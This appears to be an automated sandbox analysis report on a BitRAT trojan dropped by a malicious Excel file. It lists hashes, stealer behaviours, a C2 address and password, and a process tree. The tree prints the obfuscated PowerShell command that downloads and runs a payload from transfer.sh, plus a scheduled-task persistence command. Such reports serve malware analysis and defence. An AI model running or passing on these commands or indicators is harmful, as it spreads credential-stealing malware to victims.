bitrat | d77795d4563d03c0ec79533ac468580fa94ae26a54b5e14e34c3d6bdf9ae51b0

Analysis

max time kernel
85s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
18-09-2023 08:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Documento_Orslgroup_S.R.L_09_2023.xls
Size

100KB
MD5

c678822324d3db11afb66ad4dc9a5bb8
SHA1

db82a3d3de0b0d90cc302e903e18dd9d2fb684c4
SHA256

d77795d4563d03c0ec79533ac468580fa94ae26a54b5e14e34c3d6bdf9ae51b0
SHA512

7a753d605ee1e5e14d3dbf0a67feb80c8fee21c0bdc7cba36298eead743b541e65d5d4d3f25124ec8d4ad54c38744f244bb721f7c0edb76d1a3441c0d291d03e
SSDEEP

3072:BrxEtjPOtioVjDGUU1qfDlaGGx+cL2QnA9tJE2zuxq+fr9wBLa71ba2ryLTHeYD:pxEtjPOtioVjDGUU1qfDlavx+W2QnAnF

Score

10^/10

bitrat xenarmor collection password recovery spyware stealer trojan upx

Malware Config

Extracted

Family

bitrat

Version

1.38

185.225.75.68:3569

Attributes

communication_password
0edcbe7d888380c49e7d1dcf67b6ea6e
tor_process
tor

Signatures

BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
trojan bitrat

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4600	232	cmd.exe	21

XenArmor Suite
XenArmor is as suite of password recovery tools for various application.
recovery password xenarmor

Blocklisted process makes network request 1 IoCs

flow	pid	Process
31	536	powershell.exe

Downloads MZ/PE file

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral2/files/0x0006000000023236-152.dat	acprotect
behavioral2/files/0x0006000000023236-153.dat	acprotect

Executes dropped EXE 5 IoCs

pid	Process
3504	pxpr0.exe
4940	pxpr0.exe
2060	pxpr0.exe
4084	pxpr0.exe
432	hope.exe

Loads dropped DLL 1 IoCs

pid	Process
4084	pxpr0.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2060-117-0x0000000000400000-0x00000000008DC000-memory.dmp	upx
behavioral2/memory/2060-120-0x0000000000400000-0x00000000008DC000-memory.dmp	upx
behavioral2/memory/2060-122-0x0000000000400000-0x00000000008DC000-memory.dmp	upx
behavioral2/memory/2060-121-0x0000000000400000-0x00000000008DC000-memory.dmp	upx
behavioral2/memory/2060-197-0x0000000000400000-0x00000000008DC000-memory.dmp	upx

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	pxpr0.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

pid	Process
4940	pxpr0.exe
4940	pxpr0.exe
4940	pxpr0.exe
4940	pxpr0.exe
4940	pxpr0.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 3504 set thread context of 4940	3504	pxpr0.exe	94
PID 4940 set thread context of 2060	4940	pxpr0.exe	104
PID 2060 set thread context of 4084	2060	pxpr0.exe	105

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2320	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
232	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
536	powershell.exe
536	powershell.exe
4084	pxpr0.exe
4084	pxpr0.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	536	powershell.exe
Token: SeShutdownPrivilege	4940	pxpr0.exe
Token: SeDebugPrivilege	4084	pxpr0.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
232	EXCEL.EXE
232	EXCEL.EXE

Suspicious use of SetWindowsHookEx 16 IoCs

pid	Process
232	EXCEL.EXE
232	EXCEL.EXE
232	EXCEL.EXE
232	EXCEL.EXE
232	EXCEL.EXE
232	EXCEL.EXE
232	EXCEL.EXE
232	EXCEL.EXE
232	EXCEL.EXE
232	EXCEL.EXE
232	EXCEL.EXE
232	EXCEL.EXE
232	EXCEL.EXE
232	EXCEL.EXE
4940	pxpr0.exe
4940	pxpr0.exe

Suspicious use of WriteProcessMemory 46 IoCs

description	pid	Process	procid_target
PID 232 wrote to memory of 4600	232	EXCEL.EXE	88
PID 232 wrote to memory of 4600	232	EXCEL.EXE	88
PID 4600 wrote to memory of 536	4600	cmd.exe	90
PID 4600 wrote to memory of 536	4600	cmd.exe	90
PID 536 wrote to memory of 3504	536	powershell.exe	93
PID 536 wrote to memory of 3504	536	powershell.exe	93
PID 536 wrote to memory of 3504	536	powershell.exe	93
PID 3504 wrote to memory of 4940	3504	pxpr0.exe	94
PID 3504 wrote to memory of 4940	3504	pxpr0.exe	94
PID 3504 wrote to memory of 4940	3504	pxpr0.exe	94
PID 3504 wrote to memory of 4940	3504	pxpr0.exe	94
PID 3504 wrote to memory of 4940	3504	pxpr0.exe	94
PID 3504 wrote to memory of 4940	3504	pxpr0.exe	94
PID 3504 wrote to memory of 4940	3504	pxpr0.exe	94
PID 3504 wrote to memory of 4940	3504	pxpr0.exe	94
PID 3504 wrote to memory of 4940	3504	pxpr0.exe	94
PID 3504 wrote to memory of 4940	3504	pxpr0.exe	94
PID 3504 wrote to memory of 4940	3504	pxpr0.exe	94
PID 3504 wrote to memory of 384	3504	pxpr0.exe	95
PID 3504 wrote to memory of 384	3504	pxpr0.exe	95
PID 3504 wrote to memory of 384	3504	pxpr0.exe	95
PID 3504 wrote to memory of 2940	3504	pxpr0.exe	100
PID 3504 wrote to memory of 2940	3504	pxpr0.exe	100
PID 3504 wrote to memory of 2940	3504	pxpr0.exe	100
PID 3504 wrote to memory of 4984	3504	pxpr0.exe	99
PID 3504 wrote to memory of 4984	3504	pxpr0.exe	99
PID 3504 wrote to memory of 4984	3504	pxpr0.exe	99
PID 2940 wrote to memory of 2320	2940	cmd.exe	101
PID 2940 wrote to memory of 2320	2940	cmd.exe	101
PID 2940 wrote to memory of 2320	2940	cmd.exe	101
PID 4940 wrote to memory of 2060	4940	pxpr0.exe	104
PID 4940 wrote to memory of 2060	4940	pxpr0.exe	104
PID 4940 wrote to memory of 2060	4940	pxpr0.exe	104
PID 4940 wrote to memory of 2060	4940	pxpr0.exe	104
PID 4940 wrote to memory of 2060	4940	pxpr0.exe	104
PID 4940 wrote to memory of 2060	4940	pxpr0.exe	104
PID 4940 wrote to memory of 2060	4940	pxpr0.exe	104
PID 4940 wrote to memory of 2060	4940	pxpr0.exe	104
PID 2060 wrote to memory of 4084	2060	pxpr0.exe	105
PID 2060 wrote to memory of 4084	2060	pxpr0.exe	105
PID 2060 wrote to memory of 4084	2060	pxpr0.exe	105
PID 2060 wrote to memory of 4084	2060	pxpr0.exe	105
PID 2060 wrote to memory of 4084	2060	pxpr0.exe	105
PID 2060 wrote to memory of 4084	2060	pxpr0.exe	105
PID 2060 wrote to memory of 4084	2060	pxpr0.exe	105
PID 2060 wrote to memory of 4084	2060	pxpr0.exe	105

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Documento_Orslgroup_S.R.L_09_2023.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:232
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/SkazYLa2BT/happy.e^xe -o C:\Users\Public\pxpr0.exe;C:\Users\Public\pxpr0.exe
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:4600
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell /W 01 curl https://transfer.sh/get/SkazYLa2BT/happy.exe -o C:\Users\Public\pxpr0.exe;C:\Users\Public\pxpr0.exe
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:536
  - - C:\Users\Public\pxpr0.exe
      "C:\Users\Public\pxpr0.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:3504
    - - C:\Users\Public\pxpr0.exe
        
        "C:\Users\Public\pxpr0.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4940
      - C:\Users\Public\pxpr0.exe
        
        -a "C:\Users\Admin\AppData\Local\f9be9104\plg\y1wKS0Zk.json"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2060
        
        C:\Users\Public\pxpr0.exe
        
        -a "C:\Users\Admin\AppData\Local\Temp\unk.xml"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Accesses Microsoft Outlook accounts
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4084
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\hope"
        5⤵
        
        PID:384
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c copy "C:\Users\Public\pxpr0.exe" "C:\Users\Admin\AppData\Roaming\hope\hope.exe"
        5⤵
        
        PID:4984
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\hope\hope.exe'" /f
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2940
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\hope\hope.exe'" /f
        6⤵
        Creates scheduled task(s)
        
        PID:2320

C:\Users\Admin\AppData\Roaming\hope\hope.exe
C:\Users\Admin\AppData\Roaming\hope\hope.exe
1⤵
- Executes dropped EXE
PID:432

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_szc0tzvv.ppb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\unk.xml

Filesize
1KB

MD5
ce3e2f5f04eff81b3b7130a90a8e3a6e

SHA1
fe9ac39d1db0a28aeef54741003d3f639125dc1c

SHA256
b45d1dda071c8ee6b1078e8f71661ee1511887daf491a9f81415232a3c3bd631

SHA512
8cd831f9231cc30eeed546b47401459a2737d160faf0eacc823d286de22f79d68a95b994dce1f1eb6e7fa96e24aadeac50659115afe74148a33e6d31012ed357

Download Submit
C:\Users\Admin\AppData\Local\f9be9104\plg\y1wKS0Zk.json

Filesize
1KB

MD5
ce3e2f5f04eff81b3b7130a90a8e3a6e

SHA1
fe9ac39d1db0a28aeef54741003d3f639125dc1c

SHA256
b45d1dda071c8ee6b1078e8f71661ee1511887daf491a9f81415232a3c3bd631

SHA512
8cd831f9231cc30eeed546b47401459a2737d160faf0eacc823d286de22f79d68a95b994dce1f1eb6e7fa96e24aadeac50659115afe74148a33e6d31012ed357

Download Submit
C:\Users\Admin\AppData\Roaming\hope\hope.exe

Filesize
320KB

MD5
659f8678ab71664d078f321c32f54896

SHA1
bb5398c6f36f06d26b1cb8e7bd3a706c5b95c343

SHA256
634f276b899acd8afbc50d90959f9c97a43f711ebb89e820d09956cbdb0d53a4

SHA512
4460d18cb887cc28ace24192d88adf66505789d0c099a8ccd01c83fe6e5cb5c3aac14c8e6424d10e8a0d34f06f943fd30f86ae12704bd870fdb7e5623f66d585

Download Submit
C:\Users\Admin\AppData\Roaming\hope\hope.exe

Filesize
108KB

MD5
6c0575ff2f0ae25408ea372ca42eea5d

SHA1
9bd7b2490eef9cf42bf515ed81f47e5329214688

SHA256
d45a744f2cfeac5374d363fe0adf447d2ddab762f9c28e0a13d4ead977cb099d

SHA512
3abc11b8630e80eec137f2ffde65b2dc4ad12f5c6c1a66041fe9ba48a448e5831151c465c226287f96394b21996a039e62d553bd91921b975f2b180a53d0e107

Download Submit
C:\Users\Admin\AppData\Roaming\hope\hope.exe

Filesize
7.6MB

MD5
9f42c993b0f9560fce2ac89d5b823b3b

SHA1
7c3ae9d0a92335ec5076490af4544a071d69c6d4

SHA256
3e6692760e61b3e71675a24f7b5b50cde09cabf750ede2a9a365c8e482c61943

SHA512
867eaa8455f4314e355241374b0eb80bcc7d6f932330e82c0a18a8e79caba014f35621c2bc0e345d294eb95bcecfcfed7652b058c88ae52ebfa82436cc59d379

Download Submit
C:\Users\Public\License.XenArmor

Filesize
104B

MD5
4f3bde9212e17ef18226866d6ac739b6

SHA1
732733bec8314beb81437e60876ffa75e72ae6cd

SHA256
212173a405c78d70f90e8ec0699a60ed2f4a9f3a8070de62eabd666c268fb174

SHA512
10b7cdae0b9a7b0f8e1bfc66a60675fa9b25c523864d5ae3da243f4e6e4c5194f3bd92af57ac956157442f66414bdd3393d0a1e5ba4ef0f192561e8524d4e744

Download Submit
C:\Users\Public\License.XenArmor

Filesize
104B

MD5
bf5da170f7c9a8eae88d1cb1a191ff80

SHA1
dd1b991a1b03587a5d1edc94e919a2070e325610

SHA256
e5d5110feb21939d82d962981aeaaafc4643b40a9b87cbed800ace82135d57cd

SHA512
9e32247d8556fd6efffbf7b6b9c325652d8c4b223b0fa38020879171476a49ab1f64d8897b5d8d92b79c5484fd9d5899be26ca5f664ee1f9c2acb0857084121e

Download Submit
C:\Users\Public\Unknown.dll

Filesize
793KB

MD5
86114faba7e1ec4a667d2bcb2e23f024

SHA1
670df6e1ba1dc6bece046e8b2e573dd36748245e

SHA256
568da887725ccfdc4c5aae3ff66792fe60eca4e0818338f6a8434be66a6fe46d

SHA512
d26ee0da6ccd4022982cf848c46e40f6781b667e39d0c5daf5ea8d74c44e55c55a5f7590a4d2a60aa1911358ca783c4276a9b4e6311c4cea20df1ebd4f7f457f

Download Submit
C:\Users\Public\Unknown.dll

Filesize
793KB

MD5
86114faba7e1ec4a667d2bcb2e23f024

SHA1
670df6e1ba1dc6bece046e8b2e573dd36748245e

SHA256
568da887725ccfdc4c5aae3ff66792fe60eca4e0818338f6a8434be66a6fe46d

SHA512
d26ee0da6ccd4022982cf848c46e40f6781b667e39d0c5daf5ea8d74c44e55c55a5f7590a4d2a60aa1911358ca783c4276a9b4e6311c4cea20df1ebd4f7f457f

Download Submit
C:\Users\Public\pxpr0.exe

Filesize
7.6MB

MD5
9f42c993b0f9560fce2ac89d5b823b3b

SHA1
7c3ae9d0a92335ec5076490af4544a071d69c6d4

SHA256
3e6692760e61b3e71675a24f7b5b50cde09cabf750ede2a9a365c8e482c61943

SHA512
867eaa8455f4314e355241374b0eb80bcc7d6f932330e82c0a18a8e79caba014f35621c2bc0e345d294eb95bcecfcfed7652b058c88ae52ebfa82436cc59d379

Download Submit
C:\Users\Public\pxpr0.exe

Filesize
7.6MB

MD5
9f42c993b0f9560fce2ac89d5b823b3b

SHA1
7c3ae9d0a92335ec5076490af4544a071d69c6d4

SHA256
3e6692760e61b3e71675a24f7b5b50cde09cabf750ede2a9a365c8e482c61943

SHA512
867eaa8455f4314e355241374b0eb80bcc7d6f932330e82c0a18a8e79caba014f35621c2bc0e345d294eb95bcecfcfed7652b058c88ae52ebfa82436cc59d379

Download Submit
C:\Users\Public\pxpr0.exe

Filesize
7.6MB

MD5
9f42c993b0f9560fce2ac89d5b823b3b

SHA1
7c3ae9d0a92335ec5076490af4544a071d69c6d4

SHA256
3e6692760e61b3e71675a24f7b5b50cde09cabf750ede2a9a365c8e482c61943

SHA512
867eaa8455f4314e355241374b0eb80bcc7d6f932330e82c0a18a8e79caba014f35621c2bc0e345d294eb95bcecfcfed7652b058c88ae52ebfa82436cc59d379

Download Submit
C:\Users\Public\pxpr0.exe

Filesize
7.6MB

MD5
9f42c993b0f9560fce2ac89d5b823b3b

SHA1
7c3ae9d0a92335ec5076490af4544a071d69c6d4

SHA256
3e6692760e61b3e71675a24f7b5b50cde09cabf750ede2a9a365c8e482c61943

SHA512
867eaa8455f4314e355241374b0eb80bcc7d6f932330e82c0a18a8e79caba014f35621c2bc0e345d294eb95bcecfcfed7652b058c88ae52ebfa82436cc59d379

Download Submit
C:\Users\Public\pxpr0.exe

Filesize
7.6MB

MD5
9f42c993b0f9560fce2ac89d5b823b3b

SHA1
7c3ae9d0a92335ec5076490af4544a071d69c6d4

SHA256
3e6692760e61b3e71675a24f7b5b50cde09cabf750ede2a9a365c8e482c61943

SHA512
867eaa8455f4314e355241374b0eb80bcc7d6f932330e82c0a18a8e79caba014f35621c2bc0e345d294eb95bcecfcfed7652b058c88ae52ebfa82436cc59d379

Download Submit
memory/232-17-0x00007FFA9AD30000-0x00007FFA9AF25000-memory.dmp

Filesize
2.0MB

Download
memory/232-10-0x00007FFA9AD30000-0x00007FFA9AF25000-memory.dmp

Filesize
2.0MB

Download
memory/232-15-0x00007FFA9AD30000-0x00007FFA9AF25000-memory.dmp

Filesize
2.0MB

Download
memory/232-18-0x00007FFA9AD30000-0x00007FFA9AF25000-memory.dmp

Filesize
2.0MB

Download
memory/232-25-0x000001FFE5F00000-0x000001FFE6700000-memory.dmp

Filesize
8.0MB

Download
memory/232-27-0x000001FFE5F00000-0x000001FFE6700000-memory.dmp

Filesize
8.0MB

Download
memory/232-28-0x000001FFE5F00000-0x000001FFE6700000-memory.dmp

Filesize
8.0MB

Download
memory/232-3-0x00007FFA5ADB0000-0x00007FFA5ADC0000-memory.dmp

Filesize
64KB

Download
memory/232-2-0x00007FFA5ADB0000-0x00007FFA5ADC0000-memory.dmp

Filesize
64KB

Download
memory/232-0-0x00007FFA5ADB0000-0x00007FFA5ADC0000-memory.dmp

Filesize
64KB

Download
memory/232-6-0x00007FFA5ADB0000-0x00007FFA5ADC0000-memory.dmp

Filesize
64KB

Download
memory/232-14-0x00007FFA9AD30000-0x00007FFA9AF25000-memory.dmp

Filesize
2.0MB

Download
memory/232-7-0x00007FFA9AD30000-0x00007FFA9AF25000-memory.dmp

Filesize
2.0MB

Download
memory/232-44-0x00007FFA9AD30000-0x00007FFA9AF25000-memory.dmp

Filesize
2.0MB

Download
memory/232-45-0x00007FFA9AD30000-0x00007FFA9AF25000-memory.dmp

Filesize
2.0MB

Download
memory/232-46-0x000001FFE5F00000-0x000001FFE6700000-memory.dmp

Filesize
8.0MB

Download
memory/232-47-0x000001FFE5F00000-0x000001FFE6700000-memory.dmp

Filesize
8.0MB

Download
memory/232-48-0x000001FFE5F00000-0x000001FFE6700000-memory.dmp

Filesize
8.0MB

Download
memory/232-8-0x00007FFA5ADB0000-0x00007FFA5ADC0000-memory.dmp

Filesize
64KB

Download
memory/232-4-0x00007FFA9AD30000-0x00007FFA9AF25000-memory.dmp

Filesize
2.0MB

Download
memory/232-9-0x00007FFA9AD30000-0x00007FFA9AF25000-memory.dmp

Filesize
2.0MB

Download
memory/232-5-0x00007FFA9AD30000-0x00007FFA9AF25000-memory.dmp

Filesize
2.0MB

Download
memory/232-13-0x00007FFA9AD30000-0x00007FFA9AF25000-memory.dmp

Filesize
2.0MB

Download
memory/232-12-0x00007FFA9AD30000-0x00007FFA9AF25000-memory.dmp

Filesize
2.0MB

Download
memory/232-11-0x00007FFA58640000-0x00007FFA58650000-memory.dmp

Filesize
64KB

Download
memory/232-1-0x00007FFA9AD30000-0x00007FFA9AF25000-memory.dmp

Filesize
2.0MB

Download
memory/232-16-0x00007FFA58640000-0x00007FFA58650000-memory.dmp

Filesize
64KB

Download
memory/536-52-0x00000243A0CE0000-0x00000243A0CF0000-memory.dmp

Filesize
64KB

Download
memory/536-43-0x00000243A0CE0000-0x00000243A0CF0000-memory.dmp

Filesize
64KB

Download
memory/536-30-0x00007FFA6F680000-0x00007FFA70141000-memory.dmp

Filesize
10.8MB

Download
memory/536-63-0x00007FFA6F680000-0x00007FFA70141000-memory.dmp

Filesize
10.8MB

Download
memory/536-54-0x00000243A0CE0000-0x00000243A0CF0000-memory.dmp

Filesize
64KB

Download
memory/536-53-0x00000243A0CE0000-0x00000243A0CF0000-memory.dmp

Filesize
64KB

Download
memory/536-31-0x00000243A0CE0000-0x00000243A0CF0000-memory.dmp

Filesize
64KB

Download
memory/536-32-0x00000243A0CE0000-0x00000243A0CF0000-memory.dmp

Filesize
64KB

Download
memory/536-38-0x00000243A0DB0000-0x00000243A0DD2000-memory.dmp

Filesize
136KB

Download
memory/536-51-0x00007FFA6F680000-0x00007FFA70141000-memory.dmp

Filesize
10.8MB

Download
memory/2060-197-0x0000000000400000-0x00000000008DC000-memory.dmp

Filesize
4.9MB

Download
memory/2060-120-0x0000000000400000-0x00000000008DC000-memory.dmp

Filesize
4.9MB

Download
memory/2060-121-0x0000000000400000-0x00000000008DC000-memory.dmp

Filesize
4.9MB

Download
memory/2060-122-0x0000000000400000-0x00000000008DC000-memory.dmp

Filesize
4.9MB

Download
memory/2060-117-0x0000000000400000-0x00000000008DC000-memory.dmp

Filesize
4.9MB

Download
memory/3504-66-0x0000000005E20000-0x00000000063C4000-memory.dmp

Filesize
5.6MB

Download
memory/3504-75-0x00000000751E0000-0x0000000075990000-memory.dmp

Filesize
7.7MB

Download
memory/3504-68-0x00000000073D0000-0x0000000007B5A000-memory.dmp

Filesize
7.5MB

Download
memory/3504-67-0x0000000005860000-0x0000000005870000-memory.dmp

Filesize
64KB

Download
memory/3504-65-0x0000000000600000-0x0000000000D94000-memory.dmp

Filesize
7.6MB

Download
memory/3504-64-0x00000000751E0000-0x0000000075990000-memory.dmp

Filesize
7.7MB

Download
memory/4084-154-0x0000000010000000-0x0000000010227000-memory.dmp

Filesize
2.2MB

Download
memory/4084-170-0x0000000010000000-0x0000000010227000-memory.dmp

Filesize
2.2MB

Download
memory/4084-171-0x0000000000400000-0x00000000006FE000-memory.dmp

Filesize
3.0MB

Download
memory/4084-151-0x0000000000400000-0x00000000006FE000-memory.dmp

Filesize
3.0MB

Download
memory/4084-149-0x0000000000400000-0x00000000006FE000-memory.dmp

Filesize
3.0MB

Download
memory/4084-146-0x0000000000400000-0x00000000006FE000-memory.dmp

Filesize
3.0MB

Download
memory/4084-148-0x0000000000400000-0x00000000006FE000-memory.dmp

Filesize
3.0MB

Download
memory/4940-81-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-99-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-100-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-101-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-102-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-103-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-104-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-105-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-106-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-107-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-108-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-110-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-114-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-97-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-96-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-95-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-94-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-93-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-91-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-90-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-89-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-88-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-87-0x0000000075470000-0x00000000754A9000-memory.dmp

Filesize
228KB

Download
memory/4940-86-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-85-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-84-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-83-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-82-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-80-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-172-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-79-0x00000000750F0000-0x0000000075129000-memory.dmp

Filesize
228KB

Download
memory/4940-78-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-74-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-199-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-72-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-200-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-203-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-204-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-71-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/4940-69-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download